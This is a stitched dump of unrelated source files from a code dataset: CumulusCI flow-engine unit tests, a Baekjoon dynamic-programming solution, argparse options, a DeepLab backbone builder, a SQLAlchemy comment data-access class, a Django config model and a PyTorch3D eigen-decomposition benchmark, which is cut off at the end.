"description": "Run a task and a flow",
"steps": {1: {"task": "pass_name"}, 2: {"flow": "nested_flow"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual(2, len(flow.steps))
self.assertEqual(flow.step_return_values[0], flow.step_return_values[1][0])
def test_nested_flow_options(self, mock_class):
flow_config = FlowConfig(
{
"description": "Run a flow with task options",
"steps": {
1: {"flow": "nested_flow", "options": {"pass_name": {"foo": "bar"}}}
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual("bar", flow.steps[0].options["pass_name__foo"])
def test_nested_flow_2(self, mock_class):
""" Flows can run inside other flows and call other flows """
flow_config = FlowConfig(
{
"description": "Run a task and a flow",
"steps": {1: {"task": "pass_name"}, 2: {"flow": "nested_flow_2"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual(2, len(flow.steps))
self.assertEqual(flow.step_return_values[0], flow.step_return_values[1][0])
self.assertEqual(flow.step_return_values[0], flow.step_return_values[1][1][0])
def test_check_infinite_flows(self, mock_class):
self.project_config.config["flows"] = {
"nested_flow": {
"description": "A flow that runs inside another flow",
"steps": {1: {"flow": "nested_flow"}},
}
}
flow_config = FlowConfig({"steps": {1: {"flow": "nested_flow"}}})
with self.assertRaises(FlowInfiniteLoopError):
BaseFlow(self.project_config, flow_config, self.org_config)
def test_rejects_old_syntax(self, mock_class):
flow_config = FlowConfig({"tasks": {1: {"task": "pass_name"}}})
flow = BaseFlow(self.project_config, flow_config, self.org_config)
with self.assertRaises(FlowConfigError):
flow._get_steps_ordered()
def test_rejects_flow_and_task_in_same_step(self, mock_class):
flow_config = FlowConfig(
{"steps": {1: {"task": "pass_name", "flow": "nested_flow"}}}
)
with self.assertRaises(FlowConfigError):
BaseFlow(self.project_config, flow_config, self.org_config)
def test_call__not_prepped(self, mock_class):
flow_config = FlowConfig({})
flow = BaseFlow(self.project_config, flow_config, self.org_config, prep=False)
with self.assertRaises(FlowNotReadyError):
flow()
| """ Tests for the Flow engine """
import unittest
import logging
import mock
from collections import Callable
from cumulusci.core.flows import BaseFlow
from cumulusci.core.tasks import BaseTask
from cumulusci.core.config import FlowConfig
from cumulusci.core.config import OrgConfig
from cumulusci.core.exceptions import FlowConfigError
from cumulusci.core.exceptions import FlowInfiniteLoopError
from cumulusci.core.exceptions import FlowNotReadyError
from cumulusci.core.exceptions import TaskNotFoundError
from cumulusci.core.tests.utils import MockLoggingHandler
from cumulusci.tests.util import create_project_config
import cumulusci.core
ORG_ID = "00D000000000001"
class _TaskReturnsStuff(BaseTask):
def _run_task(self):
self.return_values = {"name": "supername"}
class _TaskResponseName(BaseTask):
task_options = {"response": {"description": "the response to print"}}
def _run_task(self):
return self.options["response"]
class _TaskRaisesException(BaseTask):
task_options = {
"exception": {"description": "The exception to raise"},
"message": {"description": "The exception message"},
}
def _run_task(self):
raise self.options["exception"](self.options["message"])
class _SfdcTask(BaseTask):
salesforce_task = True
def _run_task(self):
return -1
@mock.patch("cumulusci.core.flows.BaseFlow._init_org")
class TestBaseFlow(unittest.TestCase):
""" Tests the expectations of a BaseFlow caller """
@classmethod
def setUpClass(cls):
super(TestBaseFlow, cls).setUpClass()
logger = logging.getLogger(cumulusci.core.__name__)
logger.setLevel(logging.DEBUG)
cls._flow_log_handler = MockLoggingHandler(logging.DEBUG)
logger.addHandler(cls._flow_log_handler)
def setUp(self):
self.project_config = create_project_config("TestOwner", "TestRepo")
self.project_config.config["tasks"] = {
"pass_name": {
"description": "Pass the name",
"class_path": "cumulusci.core.tests.test_flows._TaskReturnsStuff",
},
"name_response": {
"description": "Pass the name",
"class_path": "cumulusci.core.tests.test_flows._TaskResponseName",
},
"raise_exception": {
"description": "Raises an exception",
"class_path": "cumulusci.core.tests.test_flows._TaskRaisesException",
"options": {
"exception": Exception,
"message": "Test raised exception as expected",
},
},
"sfdc_task": {
"description": "An sfdc task",
"class_path": "cumulusci.core.tests.test_flows._SfdcTask",
},
}
self.project_config.config["flows"] = {
"nested_flow": {
"description": "A flow that runs inside another flow",
"steps": {1: {"task": "pass_name"}},
},
"nested_flow_2": {
"description": "A flow that runs inside another flow, and calls another flow",
"steps": {1: {"task": "pass_name"}, 2: {"flow": "nested_flow"}},
},
}
self.org_config = OrgConfig(
{"username": "<EMAIL>", "org_id": ORG_ID}, "test"
)
self._flow_log_handler.reset()
self.flow_log = self._flow_log_handler.messages
def test_init(self, mock_class):
""" BaseFlow initializes and offers a logger """
flow_config = FlowConfig({})
mock_class.return_value = None
flow = BaseFlow(self.project_config, flow_config, self.org_config)
self.assertEqual(hasattr(flow, "logger"), True)
def test_is_callable(self, mock_class):
""" BaseFlow exposes itself as a callable for use """
flow_config = FlowConfig({})
flow = BaseFlow(self.project_config, flow_config, self.org_config)
self.assertIsInstance(flow, Callable)
def test_pass_around_values(self, mock_class):
""" A flow's options reach into return values from other tasks. """
mock_class.return_value = None
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {
1: {"task": "pass_name"},
2: {
"task": "name_response",
"options": {"response": "^^pass_name.name"},
},
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
# run the flow
flow()
# the flow results for the second task should be 'name'
self.assertEqual("supername", flow.step_results[1])
def test_task_options(self, mock_class):
""" A flow can accept task options and pass them to the task. """
mock_class.return_value = None
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "name_response", "options": {"response": "foo"}}},
}
)
flow = BaseFlow(
self.project_config,
flow_config,
self.org_config,
options={"name_response__response": "bar"},
)
# run the flow
flow()
# the flow results for the first task should be 'bar'
self.assertEqual("bar", flow.step_results[0])
def test_skip_kwarg(self, mock_class):
""" A flow can receive during init a list of tasks to skip """
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {
1: {"task": "pass_name"},
2: {
"task": "name_response",
"options": {"response": "^^pass_name.name"},
},
},
}
)
flow = BaseFlow(
self.project_config, flow_config, self.org_config, skip=["name_response"]
)
# run the flow
flow()
# the number of tasks in the flow should be 1 instead of 2
self.assertEqual(1, len(flow.step_results))
def test_skip_task_value_none(self, mock_class):
""" A flow skips any tasks whose name is None to allow override via yaml """
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "None"}},
}
)
flow = BaseFlow(
self.project_config, flow_config, self.org_config, skip=["name_response"]
)
# run the flow
flow()
# the number of tasks in the flow should be 1 instead of 2
self.assertEqual(1, len(flow.step_results))
def test_find_step_by_name_no_steps(self, mock_class):
""" Running a flow with no steps throws an error """
# instantiate a flow with two tasks
flow_config = FlowConfig({"description": "Run two tasks"})
flow = BaseFlow(self.project_config, flow_config, self.org_config)
self.assertIsNone(flow._find_step_by_name("task"))
with self.assertRaises(FlowConfigError):
flow()
def test_find_step_by_name_not_first(self, mock_class):
""" The _find_step_by_name method skips tasks that don't exist """
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {
1: {"task": "pass_name"},
2: {
"task": "name_response",
"options": {"response": "^^pass_name.name"},
},
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
task = flow._find_step_by_name("name_response")
self.assertEqual(
"cumulusci.core.tests.test_flows._TaskResponseName",
task.task_config.class_path,
)
def test_find_step_by_name__flow(self, mock_class):
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {
1: {"flow": "nested_flow"},
2: {
"task": "name_response",
"options": {
"response": "^^nested_flow.pass_name.name",
"from_flow": "^^nested_flow.name",
},
},
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
step = flow._find_step_by_name("nested_flow")
self.assertIsInstance(step, BaseFlow)
def test_render_task_config_empty_value(self, mock_class):
""" The _render_task_config method skips option values of None """
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run a tasks",
"steps": {1: {"task": "name_response", "options": {"response": None}}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
task = flow._find_step_by_name("name_response")
config = flow._render_task_config(task)
self.assertEqual(["Options:"], config)
def test_task_raises_exception_fail(self, mock_class):
""" A flow aborts when a task raises an exception """
flow_config = FlowConfig(
{"description": "Run a task", "steps": {1: {"task": "raise_exception"}}}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
self.assertRaises(Exception, flow)
def test_task_raises_exception_ignore(self, mock_class):
""" A flow continues when a task configured with ignore_failure raises an exception """
flow_config = FlowConfig(
{
"description": "Run a task",
"steps": {
1: {"task": "raise_exception", "ignore_failure": True},
2: {"task": "pass_name"},
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual(2, len(flow.steps))
def test_call_no_tasks(self, mock_class):
""" A flow with no tasks will have no responses. """
flow_config = FlowConfig({"description": "Run no tasks", "steps": {}})
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual([], flow.step_return_values)
self.assertEqual([], flow.steps)
def test_call_one_task(self, mock_class):
""" A flow with one task will execute the task """
flow_config = FlowConfig(
{"description": "Run one task", "steps": {1: {"task": "pass_name"}}}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertTrue(
any("Flow Description: Run one task" in s for s in self.flow_log["info"])
)
self.assertEqual([{"name": "supername"}], flow.step_return_values)
self.assertEqual(1, len(flow.steps))
def test_call_many_tasks(self, mock_class):
""" A flow with many tasks will dispatch each task """
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "pass_name"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual(
[{"name": "supername"}, {"name": "supername"}], flow.step_return_values
)
self.assertEqual(2, len(flow.steps))
def test_call_task_not_found(self, mock_class):
""" A flow with reference to a task that doesn't exist in the
project will throw a TaskNotFoundError """
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "do_delightulthings"}},
}
)
with self.assertRaises(TaskNotFoundError):
flow = BaseFlow(self.project_config, flow_config, self.org_config)
def test_flow_prints_org_id(self, mock_class):
""" A flow with an org prints the org ID """
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "pass_name"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
org_id_logs = [s for s in self.flow_log["info"] if ORG_ID in s]
self.assertEqual(1, len(org_id_logs))
def test_flow_no_org_no_org_id(self, mock_class):
""" A flow without an org does not print the org ID """
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "pass_name"}},
}
)
flow = BaseFlow(self.project_config, flow_config, None)
flow()
self.assertFalse(any(ORG_ID in s for s in self.flow_log["info"]))
def test_flow_prints_org_id_once_only(self, mock_class):
""" A flow with sf tasks prints the org ID only once."""
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "sfdc_task"}, 2: {"task": "sfdc_task"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
org_id_logs = [s for s in self.flow_log["info"] if ORG_ID in s]
self.assertEqual(1, len(org_id_logs))
def test_nested_flow(self, mock_class):
""" Flows can run inside other flows """
flow_config = FlowConfig(
{
"description": "Run a task and a flow",
"steps": {1: {"task": "pass_name"}, 2: {"flow": "nested_flow"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual(2, len(flow.steps))
self.assertEqual(flow.step_return_values[0], flow.step_return_values[1][0])
def test_nested_flow_options(self, mock_class):
flow_config = FlowConfig(
{
"description": "Run a flow with task options",
"steps": {
1: {"flow": "nested_flow", "options": {"pass_name": {"foo": "bar"}}}
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual("bar", flow.steps[0].options["pass_name__foo"])
def test_nested_flow_2(self, mock_class):
""" Flows can run inside other flows and call other flows """
flow_config = FlowConfig(
{
"description": "Run a task and a flow",
"steps": {1: {"task": "pass_name"}, 2: {"flow": "nested_flow_2"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual(2, len(flow.steps))
self.assertEqual(flow.step_return_values[0], flow.step_return_values[1][0])
self.assertEqual(flow.step_return_values[0], flow.step_return_values[1][1][0])
def test_check_infinite_flows(self, mock_class):
self.project_config.config["flows"] = {
"nested_flow": {
"description": "A flow that runs inside another flow",
"steps": {1: {"flow": "nested_flow"}},
}
}
flow_config = FlowConfig({"steps": {1: {"flow": "nested_flow"}}})
with self.assertRaises(FlowInfiniteLoopError):
BaseFlow(self.project_config, flow_config, self.org_config)
def test_rejects_old_syntax(self, mock_class):
flow_config = FlowConfig({"tasks": {1: {"task": "pass_name"}}})
flow = BaseFlow(self.project_config, flow_config, self.org_config)
with self.assertRaises(FlowConfigError):
flow._get_steps_ordered()
def test_rejects_flow_and_task_in_same_step(self, mock_class):
flow_config = FlowConfig(
{"steps": {1: {"task": "pass_name", "flow": "nested_flow"}}}
)
with self.assertRaises(FlowConfigError):
BaseFlow(self.project_config, flow_config, self.org_config)
def test_call__not_prepped(self, mock_class):
flow_config = FlowConfig({})
flow = BaseFlow(self.project_config, flow_config, self.org_config, prep=False)
with self.assertRaises(FlowNotReadyError):
flow() | en | 0.910759 | Tests for the Flow engine Tests the expectations of a BaseFlow caller BaseFlow initializes and offers a logger BaseFlow exposes itself as a callable for use A flow's options reach into return values from other tasks. # instantiate a flow with two tasks # run the flow # the flow results for the second task should be 'name' A flow can accept task options and pass them to the task. # instantiate a flow with two tasks # run the flow # the flow results for the first task should be 'bar' A flow can receive during init a list of tasks to skip # instantiate a flow with two tasks # run the flow # the number of tasks in the flow should be 1 instead of 2 A flow skips any tasks whose name is None to allow override via yaml # instantiate a flow with two tasks # run the flow # the number of tasks in the flow should be 1 instead of 2 Running a flow with no steps throws an error # instantiate a flow with two tasks The _find_step_by_name method skips tasks that don't exist # instantiate a flow with two tasks The _render_task_config method skips option values of None # instantiate a flow with two tasks A flow aborts when a task raises an exception A flow continues when a task configured with ignore_failure raises an exception A flow with no tasks will have no responses. A flow with one task will execute the task A flow with many tasks will dispatch each task A flow with reference to a task that doesn't exist in the project will throw a TaskNotFoundError A flow with an org prints the org ID A flow without an org does not print the org ID A flow with sf tasks prints the org ID only once. Flows can run inside other flows Flows can run inside other flows and call other flows | 2.253898 | 2 |
baekjoon/python/guitarlist_1495.py | yskang/AlgorithmPractice | 0 | 6632472 | # Title: 기타리스트
# Link: https://www.acmicpc.net/problem/1495
import sys
sys.setrecursionlimit(10 ** 6)
read_list_int = lambda: list(map(int, sys.stdin.readline().strip().split(' ')))
def solution(n: int, s: int, m: int, v: list):
dp = [{} for _ in range(n+1)]
dp[0][s] = True
for i in range(0, n):
for x in dp[i].keys():
if x-v[i] >= 0:
dp[i+1][x-v[i]] = True
if x+v[i] <= m:
dp[i+1][x+v[i]] = True
return sorted(dp[n].keys(), reverse=True)[0] if len(dp[n]) > 0 else -1
def main():
n, s, m = read_list_int()
v = read_list_int()
print(solution(n, s, m, v))
if __name__ == '__main__':
main() | # Title: 기타리스트
# Link: https://www.acmicpc.net/problem/1495
import sys
sys.setrecursionlimit(10 ** 6)
read_list_int = lambda: list(map(int, sys.stdin.readline().strip().split(' ')))
def solution(n: int, s: int, m: int, v: list):
dp = [{} for _ in range(n+1)]
dp[0][s] = True
for i in range(0, n):
for x in dp[i].keys():
if x-v[i] >= 0:
dp[i+1][x-v[i]] = True
if x+v[i] <= m:
dp[i+1][x+v[i]] = True
return sorted(dp[n].keys(), reverse=True)[0] if len(dp[n]) > 0 else -1
def main():
n, s, m = read_list_int()
v = read_list_int()
print(solution(n, s, m, v))
if __name__ == '__main__':
main() | en | 0.49608 | # Title: 기타리스트 # Link: https://www.acmicpc.net/problem/1495 | 2.765428 | 3 |
opts.py | xuehuiping/Global-Encoding | 0 | 6632473 | <filename>opts.py
def model_opts(parser):
parser.add_argument('-config', default='lcsts.yaml', type=str,
help="config file")
parser.add_argument('-gpus', default=[], nargs='+', type=int,
help="Use CUDA on the listed devices.")
parser.add_argument('-restore', default='', type=str,
help="restore checkpoint")
parser.add_argument('-seed', type=int, default=1234,
help="Random seed")
parser.add_argument('-model', default='seq2seq', type=str,
help="Model selection")
parser.add_argument('-mode', default='train', type=str,
help="Mode selection")
parser.add_argument('-module', default='seq2seq', type=str,
help="Module selection")
parser.add_argument('-log', default='', type=str,
help="log directory")
parser.add_argument('-num_processes', type=int, default=4,
help="number of processes")
parser.add_argument('-refF', default='', type=str,
help="reference file")
parser.add_argument('-unk', action='store_true', help='replace unk')
parser.add_argument('-char', action='store_true', help='char level decoding')
parser.add_argument('-length_norm', action='store_true', help='replace unk')
parser.add_argument('-pool_size', type=int, default=0, help="pool size of maxout layer")
parser.add_argument('-scale', type=float, default=1, help="proportion of the training set")
parser.add_argument('-max_split', type=int, default=0, help="max generator time steps for memory efficiency")
parser.add_argument('-split_num', type=int, default=0, help="split number for splitres")
parser.add_argument('-pretrain', default='', type=str, help="load pretrain encoder")
def convert_to_config(opt, config):
opt = vars(opt)
for key in opt:
if key not in config:
config[key] = opt[key]
| <filename>opts.py
def model_opts(parser):
parser.add_argument('-config', default='lcsts.yaml', type=str,
help="config file")
parser.add_argument('-gpus', default=[], nargs='+', type=int,
help="Use CUDA on the listed devices.")
parser.add_argument('-restore', default='', type=str,
help="restore checkpoint")
parser.add_argument('-seed', type=int, default=1234,
help="Random seed")
parser.add_argument('-model', default='seq2seq', type=str,
help="Model selection")
parser.add_argument('-mode', default='train', type=str,
help="Mode selection")
parser.add_argument('-module', default='seq2seq', type=str,
help="Module selection")
parser.add_argument('-log', default='', type=str,
help="log directory")
parser.add_argument('-num_processes', type=int, default=4,
help="number of processes")
parser.add_argument('-refF', default='', type=str,
help="reference file")
parser.add_argument('-unk', action='store_true', help='replace unk')
parser.add_argument('-char', action='store_true', help='char level decoding')
parser.add_argument('-length_norm', action='store_true', help='replace unk')
parser.add_argument('-pool_size', type=int, default=0, help="pool size of maxout layer")
parser.add_argument('-scale', type=float, default=1, help="proportion of the training set")
parser.add_argument('-max_split', type=int, default=0, help="max generator time steps for memory efficiency")
parser.add_argument('-split_num', type=int, default=0, help="split number for splitres")
parser.add_argument('-pretrain', default='', type=str, help="load pretrain encoder")
def convert_to_config(opt, config):
opt = vars(opt)
for key in opt:
if key not in config:
config[key] = opt[key]
| none | 1 | 2.120573 | 2 |
|
task/sseg/module/backbone/__init__.py | ZHKKKe/PixelSSL | 223 | 6632474 | """
This file is adapted from https://github.com/jfzhang95/pytorch-deeplab-xception
"""
from . import resnet
def build_backbone(backbone, output_stride, BatchNorm, pretrained_backbone_url):
if backbone in ['resnet50']:
return resnet.ResNet50(output_stride, BatchNorm, pretrained_backbone_url)
elif backbone in ['resnet101', 'resnet101-coco']:
return resnet.ResNet101(output_stride, BatchNorm, pretrained_backbone_url)
else:
raise NotImplementedError
| """
This file is adapted from https://github.com/jfzhang95/pytorch-deeplab-xception
"""
from . import resnet
def build_backbone(backbone, output_stride, BatchNorm, pretrained_backbone_url):
if backbone in ['resnet50']:
return resnet.ResNet50(output_stride, BatchNorm, pretrained_backbone_url)
elif backbone in ['resnet101', 'resnet101-coco']:
return resnet.ResNet101(output_stride, BatchNorm, pretrained_backbone_url)
else:
raise NotImplementedError
| en | 0.875327 | This file is adapted from https://github.com/jfzhang95/pytorch-deeplab-xception | 2.330137 | 2 |
webapi/db/dals/comment_dal.py | xqhgit/fastapi-vue-blog | 3 | 6632475 | # -*-coding:utf-8 -*-
from typing import List, Optional
from sqlalchemy import func, desc, delete, update
from sqlalchemy.future import select
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy.orm import selectinload, joinedload
from webapi.db.models import Comment
from webapi.db.schemas.comment import CommentCreate, CommentInUpdate
class CommentDAL:
def __init__(self, db_session: AsyncSession):
self.db_session = db_session
async def create(self, obj_in: CommentCreate):
data = obj_in.dict(exclude_none=True)
db_obj = Comment(**data)
self.db_session.add(db_obj)
await self.db_session.flush()
return db_obj
async def delete(self, *, db_obj: Comment):
await self.db_session.execute(update(Comment).where(Comment.replied_id == db_obj.id).values(replied_id=None))
await self.db_session.execute(delete(Comment).where(Comment.id == db_obj.id))
async def update(self, db_obj: Comment, obj_in: CommentInUpdate):
update_data = obj_in.dict(exclude_none=True)
for field in update_data:
setattr(db_obj, field, update_data[field])
self.db_session.add(db_obj)
await self.db_session.flush()
return db_obj
async def get_by_id(self, record_id: int, *, reviewed=None):
stmt = select(Comment).where(Comment.id == record_id)
if reviewed is not None:
stmt = stmt.where(Comment.reviewed == reviewed)
q = await self.db_session.execute(stmt)
result = q.scalars().all()
if result:
return result[0]
else:
return None
async def count(self, *, reviewed=None):
stmt = select(func.count(Comment.id).label('total'))
if reviewed is not None:
stmt = stmt.where(Comment.reviewed == reviewed)
q = await self.db_session.execute(stmt)
return q.one()['total']
async def get_limit(self, *, page, limit, reviewed=None):
offset = limit * (page - 1)
stmt = select(Comment).options(selectinload(Comment.post))
if reviewed is not None:
stmt = stmt.where(Comment.reviewed == reviewed)
stmt = stmt.order_by(desc(Comment.timestamp)).offset(offset).limit(limit)
q = await self.db_session.execute(stmt)
return q.scalars().all()
| # -*-coding:utf-8 -*-
from typing import List, Optional
from sqlalchemy import func, desc, delete, update
from sqlalchemy.future import select
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy.orm import selectinload, joinedload
from webapi.db.models import Comment
from webapi.db.schemas.comment import CommentCreate, CommentInUpdate
class CommentDAL:
def __init__(self, db_session: AsyncSession):
self.db_session = db_session
async def create(self, obj_in: CommentCreate):
data = obj_in.dict(exclude_none=True)
db_obj = Comment(**data)
self.db_session.add(db_obj)
await self.db_session.flush()
return db_obj
async def delete(self, *, db_obj: Comment):
await self.db_session.execute(update(Comment).where(Comment.replied_id == db_obj.id).values(replied_id=None))
await self.db_session.execute(delete(Comment).where(Comment.id == db_obj.id))
async def update(self, db_obj: Comment, obj_in: CommentInUpdate):
update_data = obj_in.dict(exclude_none=True)
for field in update_data:
setattr(db_obj, field, update_data[field])
self.db_session.add(db_obj)
await self.db_session.flush()
return db_obj
async def get_by_id(self, record_id: int, *, reviewed=None):
stmt = select(Comment).where(Comment.id == record_id)
if reviewed is not None:
stmt = stmt.where(Comment.reviewed == reviewed)
q = await self.db_session.execute(stmt)
result = q.scalars().all()
if result:
return result[0]
else:
return None
async def count(self, *, reviewed=None):
stmt = select(func.count(Comment.id).label('total'))
if reviewed is not None:
stmt = stmt.where(Comment.reviewed == reviewed)
q = await self.db_session.execute(stmt)
return q.one()['total']
async def get_limit(self, *, page, limit, reviewed=None):
offset = limit * (page - 1)
stmt = select(Comment).options(selectinload(Comment.post))
if reviewed is not None:
stmt = stmt.where(Comment.reviewed == reviewed)
stmt = stmt.order_by(desc(Comment.timestamp)).offset(offset).limit(limit)
q = await self.db_session.execute(stmt)
return q.scalars().all()
| en | 0.652073 | # -*-coding:utf-8 -*- | 2.303869 | 2 |
handlers/__init__.py | Args-Engine/rb-distributed-helloworld | 0 | 6632476 | from .handshake_handler import HandshakeHandler
from .pingpong_handler import PingPongHandler
handler_types = {"Handshake": HandshakeHandler.handle,
"Ping": PingPongHandler.handle}
| from .handshake_handler import HandshakeHandler
from .pingpong_handler import PingPongHandler
handler_types = {"Handshake": HandshakeHandler.handle,
"Ping": PingPongHandler.handle}
| none | 1 | 1.559551 | 2 |
|
src/sage/combinat/integer_lists/__init__.py | defeo/sage | 3 | 6632477 | <gh_stars>1-10
from __future__ import absolute_import
from .base import IntegerListsBackend, Envelope
from .lists import IntegerLists
from .invlex import IntegerListsLex
from sage.structure.sage_object import register_unpickle_override
register_unpickle_override('sage.combinat.integer_list', 'IntegerListsLex', IntegerListsLex)
| from __future__ import absolute_import
from .base import IntegerListsBackend, Envelope
from .lists import IntegerLists
from .invlex import IntegerListsLex
from sage.structure.sage_object import register_unpickle_override
register_unpickle_override('sage.combinat.integer_list', 'IntegerListsLex', IntegerListsLex) | none | 1 | 1.178677 | 1 |
|
src/core/models.py | IssTech/IssAssist | 0 | 6632478 | <filename>src/core/models.py
# Django Core Modules
from django.db import models
from django.conf import settings
# Apps specific
class CoreConfig(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, default=1, on_delete=models.CASCADE)
hostname = models.CharField(max_length = 128, default = 'hostname', blank=False)
fqdn = models.CharField(max_length = 256, default = 'hostname.company.com', blank = True)
ipv4_address = models.CharField(max_length = 128, default = '1.2.3.4', blank=False)
#isssys_agent = models.ForeignKey(IssSys, default=None, blank=True, null=True, on_delete=models.CASCADE)
def __str__(self):
return(self.fqdn)
| <filename>src/core/models.py
# Django Core Modules
from django.db import models
from django.conf import settings
# Apps specific
class CoreConfig(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, default=1, on_delete=models.CASCADE)
hostname = models.CharField(max_length = 128, default = 'hostname', blank=False)
fqdn = models.CharField(max_length = 256, default = 'hostname.company.com', blank = True)
ipv4_address = models.CharField(max_length = 128, default = '1.2.3.4', blank=False)
#isssys_agent = models.ForeignKey(IssSys, default=None, blank=True, null=True, on_delete=models.CASCADE)
def __str__(self):
return(self.fqdn)
| en | 0.227467 | # Django Core Modules # Apps specific #isssys_agent = models.ForeignKey(IssSys, default=None, blank=True, null=True, on_delete=models.CASCADE) | 2.117107 | 2 |
tests/benchmarks/bm_symeig3x3.py | janEbert/pytorch3d | 1 | 6632479 | <gh_stars>1-10
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from itertools import product
from typing import Any, Callable
import torch
from common_testing import get_random_cuda_device
from fvcore.common.benchmark import benchmark
from pytorch3d.common.workaround import symeig3x3
from test_symeig3x3 import TestSymEig3x3
torch.set_num_threads(1)
CUDA_DEVICE = get_random_cuda_device()
def create_traced_func(func, device, batch_size):
traced_func = torch.jit.trace(
func, (TestSymEig3x3.create_random_sym3x3(device, batch_size),)
)
return traced_func
FUNC_NAME_TO_FUNC = {
"sym3x3eig": (lambda inputs: symeig3x3(inputs, eigenvectors=True)),
"sym3x3eig_traced_cuda": create_traced_func(
(lambda inputs: symeig3x3(inputs, eigenvectors=True)), CUDA_DEVICE, 1024
),
"torch_symeig": (lambda inputs: torch.symeig(inputs, eigenvectors=True)),
"torch_linalg_eigh": (lambda inputs: torch.linalg.eigh(inputs)),
"torch_pca_lowrank": (
lambda inputs: torch.pca_lowrank(inputs, center=False, niter=1)
),
"sym3x3eig_no_vecs": (lambda inputs: symeig3x3(inputs, eigenvectors=False)),
"torch_symeig_no_vecs": (lambda inputs: torch.symeig(inputs, eigenvectors=False)),
"torch_linalg_eigvalsh_no_vecs": (lambda inputs: torch.linalg.eigvalsh(inputs)),
}
def test_symeig3x3(func_name, batch_size, device) -> Callable[[], Any]:
func = FUNC_NAME_TO_FUNC[func_name]
inputs = TestSymEig3x3.create_random_sym3x3(device, batch_size)
torch.cuda.synchronize()
def symeig3x3():
func(inputs)
torch.cuda.synchronize()
return symeig3x3
def bm_symeig3x3() -> None:
devices = ["cpu"]
if torch.cuda.is_available():
devices.append(CUDA_DEVICE)
kwargs_list = []
func_names = FUNC_NAME_TO_FUNC.keys()
batch_sizes = [16, 128, 1024, 8192, 65536, 1048576]
for func_name, batch_size, device in product(func_names, batch_sizes, devices):
# Run CUDA-only implementations only on GPU
if "cuda" in func_name and not device.startswith("cuda"):
continue
# Torch built-ins are quite slow on larger batches
if "torch" in func_name and batch_size > 8192:
continue
# Avoid running CPU implementations on larger batches as well
if device == "cpu" and batch_size > 8192:
continue
kwargs_list.append(
{"func_name": func_name, "batch_size": batch_size, "device": device}
)
benchmark(
test_symeig3x3,
"SYMEIG3X3",
kwargs_list,
warmup_iters=3,
)
if __name__ == "__main__":
bm_symeig3x3()
| # Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from itertools import product
from typing import Any, Callable
import torch
from common_testing import get_random_cuda_device
from fvcore.common.benchmark import benchmark
from pytorch3d.common.workaround import symeig3x3
from test_symeig3x3 import TestSymEig3x3
torch.set_num_threads(1)
CUDA_DEVICE = get_random_cuda_device()
def create_traced_func(func, device, batch_size):
traced_func = torch.jit.trace(
func, (TestSymEig3x3.create_random_sym3x3(device, batch_size),)
)
return traced_func
FUNC_NAME_TO_FUNC = {
"sym3x3eig": (lambda inputs: symeig3x3(inputs, eigenvectors=True)),
"sym3x3eig_traced_cuda": create_traced_func(
(lambda inputs: symeig3x3(inputs, eigenvectors=True)), CUDA_DEVICE, 1024
),
"torch_symeig": (lambda inputs: torch.symeig(inputs, eigenvectors=True)),
"torch_linalg_eigh": (lambda inputs: torch.linalg.eigh(inputs)),
"torch_pca_lowrank": (
lambda inputs: torch.pca_lowrank(inputs, center=False, niter=1)
),
"sym3x3eig_no_vecs": (lambda inputs: symeig3x3(inputs, eigenvectors=False)),
"torch_symeig_no_vecs": (lambda inputs: torch.symeig(inputs, eigenvectors=False)),
"torch_linalg_eigvalsh_no_vecs": (lambda inputs: torch.linalg.eigvalsh(inputs)),
}
def test_symeig3x3(func_name, batch_size, device) -> Callable[[], Any]:
func = FUNC_NAME_TO_FUNC[func_name]
inputs = TestSymEig3x3.create_random_sym3x3(device, batch_size)
torch.cuda.synchronize()
def symeig3x3():
func(inputs)
torch.cuda.synchronize()
return symeig3x3
def bm_symeig3x3() -> None:
devices = ["cpu"]
if torch.cuda.is_available():
